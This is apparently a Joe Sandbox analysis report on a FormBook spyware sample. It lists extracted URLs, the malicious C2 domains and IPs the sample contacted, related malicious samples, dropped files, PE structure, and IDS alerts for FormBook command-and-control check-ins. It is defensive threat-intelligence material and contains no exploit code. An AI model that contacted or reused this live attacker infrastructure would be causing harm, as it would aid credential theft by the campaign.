                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.ecosia.org/newtab/finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.graviton.energy/images/favicons/safari-pinned-tab.svgfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://ac.ecosia.org/autocomplete?q=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://use.typekit.net/bag0psx.cssfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.wofffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://i4.cdn-image.com/__media__/js/min.js?v2.3finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.graviton.energy/images/favicons/favicon-16x16.pngfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.graviton.energy/images/favicons/apple-touch-icon.pngfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://localhost/arkanoid_server/requests.phpfinger.exe, 00000008.00000002.3271932261.000000000361C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2225572633.00000000073BC000.00000004.80000000.00040000.00000000.sdmp, 72STaC6BmljfbIQ.exefalse
                                                                                              high
                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.wofffinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.mohawktooldie.online/Best_Hair_Straighteners.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7Sbfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.graviton.energy/js/app.jsfinger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.mohawktooldie.online/Coconut_Oil_for_Hair_Growth.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bfinger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    209.74.79.42
                                                                                                    www.primespot.liveUnited States
                                                                                                    31744MULTIBAND-NEWHOPEUStrue
                                                                                                    134.122.191.187
                                                                                                    www.smalleyes.icuUnited States
                                                                                                    64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                    178.172.160.30
                                                                                                    www.phdcoach.proBelarus
                                                                                                    6697BELPAK-ASBELPAKBYtrue
                                                                                                    156.234.28.101
                                                                                                    www.btblxhh.topSeychelles
                                                                                                    136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                                                    208.91.197.27
                                                                                                    www.mohawktooldie.onlineVirgin Islands (BRITISH)
                                                                                                    40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                    185.101.158.113
                                                                                                    www.graviton.energySwitzerland
                                                                                                    207143HOSTTECH-ASCHtrue
                                                                                                    194.58.112.174
                                                                                                    www.elinor.clubRussian Federation
                                                                                                    197695AS-REGRUtrue
                                                                                                    172.67.218.146
                                                                                                    www.pbfgm.xyzUnited States
                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1567386
                                                                                                    Start date and time:2024-12-03 14:13:49 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 9m 46s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Run name:Run with higher sleep bypass
                                                                                                    Number of analysed new started processes analysed:13
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:2
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:72STaC6BmljfbIQ.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@11/2@9/8
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 75%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 91%
                                                                                                    • Number of executed functions: 98
                                                                                                    • Number of non-executed functions: 286
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: 72STaC6BmljfbIQ.exe
                                                                                                    No simulations
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    208.91.197.27PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.guacamask.online/rfhq/
                                                                                                    specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.cortisalincontrol.net/cbfz/
                                                                                                    1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.joeltcarpenter.online/9pyp/
                                                                                                    ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.cortisalincontrol.net/cbfz/
                                                                                                    W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.matteicapital.online/hyyd/
                                                                                                    FATURA.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.martaschrimpf.info/qr9f/
                                                                                                    Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.matteicapital.online/hyyd/
                                                                                                    file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.regislemberthe.online/1y0g/
                                                                                                    ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • www.614genetics.online/ftvk/
                                                                                                    TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.martaschrimpf.info/qr9f/
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    www.elinor.clubPre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 194.58.112.174
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    BCPL-SGBGPNETGlobalASNSGProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 202.79.161.151
                                                                                                    BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 27.124.4.246
                                                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 202.79.161.151
                                                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 180.215.169.147
                                                                                                    ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 202.79.161.151
                                                                                                    jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 143.92.41.12
                                                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 27.124.4.246
                                                                                                    purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 27.124.4.246
                                                                                                    http://wwwfucai13.ccGet hashmaliciousUnknownBrowse
                                                                                                    • 143.92.58.241
                                                                                                    Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 202.79.161.151
                                                                                                    BELPAK-ASBELPAKBYsora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 93.85.251.230
                                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    • 178.123.247.50
                                                                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    • 93.84.255.189
                                                                                                    la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 93.84.246.139
                                                                                                    botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 93.84.37.179
                                                                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 178.120.4.162
                                                                                                    botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 93.85.251.223
                                                                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 93.84.1.45
                                                                                                    m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 178.120.252.216
                                                                                                    nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 37.215.18.142
                                                                                                    MULTIBAND-NEWHOPEUSProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 209.74.77.109
                                                                                                    Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 209.74.77.107
                                                                                                    specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 209.74.64.187
                                                                                                    Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 209.74.77.108
                                                                                                    specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 209.74.77.107
                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 209.74.77.109
                                                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 209.74.77.107
                                                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 209.74.77.108
                                                                                                    ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 209.74.77.107
                                                                                                    Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 209.74.77.108
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Users\user\Desktop\72STaC6BmljfbIQ.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1216
                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                    Malicious:true
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                    Process:C:\Windows\SysWOW64\finger.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196608
                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.803479482947206
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:72STaC6BmljfbIQ.exe
                                                                                                    File size:765'952 bytes
                                                                                                    MD5:a8058bb3809176bc3ee9e52df4960f87
                                                                                                    SHA1:e417d18ba2bc63b1f4cc4d915e611aa963c1aec4
                                                                                                    SHA256:04f2a2c8f4f414e1d33b5f2c3d8a0a3d915d5bb155914f16aec22e31e0ab2ebd
                                                                                                    SHA512:3872c3f2a9e184b91c6bb566f51756bfc8b5060e35ee85520f697718d06681126bfb35223c5de0eb1a17d21e35f82265debd130a4e4e8eb3c2552ccc154edd7f
                                                                                                    SSDEEP:12288:KIR4R52J+Xt6+5O0RAk+KwHq34jDari3/i+RWcq11aSI9d1xY/bbgDbMc6VtIRi:KIeeL+RAk+KeQ4Se/twB18SI9d1xibg8
                                                                                                    TLSH:D4F412286A17D407CA9157780EB3F27466AC5FDDEA0093235FEDBEABF836D144C94281
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....eNg..............0..X...T.......t... ........@.. ....................................@................................
                                                                                                    Icon Hash:033424c4c199d839
                                                                                                    Entrypoint:0x4b749a
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x674E65C3 [Tue Dec 3 01:58:27 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb74480x4f.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x4ca8.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000xb54a00xb5800017d1cbe7bc68fc61c53df23dba9f2dcFalse0.9385586152720385data7.812825640175082IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0xb80000x4ca80x500029d46f9e9ce50644c63a3b0bac3d2e73False0.917724609375data7.66720644150444IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0xbe0000xc0x400e9ce0413dd05ab12838773bfc2ee20e0False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0xb81000x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                                    RT_GROUP_ICON0xbc80c0x14data1.05
                                                                                                    RT_VERSION0xbc8300x278data0.4699367088607595
                                                                                                    RT_MANIFEST0xbcab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-12-03T14:15:52.396161+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849713172.67.218.14680TCP
                                                                                                    2024-12-03T14:15:52.396161+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849713172.67.218.14680TCP
                                                                                                    2024-12-03T14:16:09.697614+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849714178.172.160.3080TCP
                                                                                                    2024-12-03T14:16:12.321713+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849715178.172.160.3080TCP
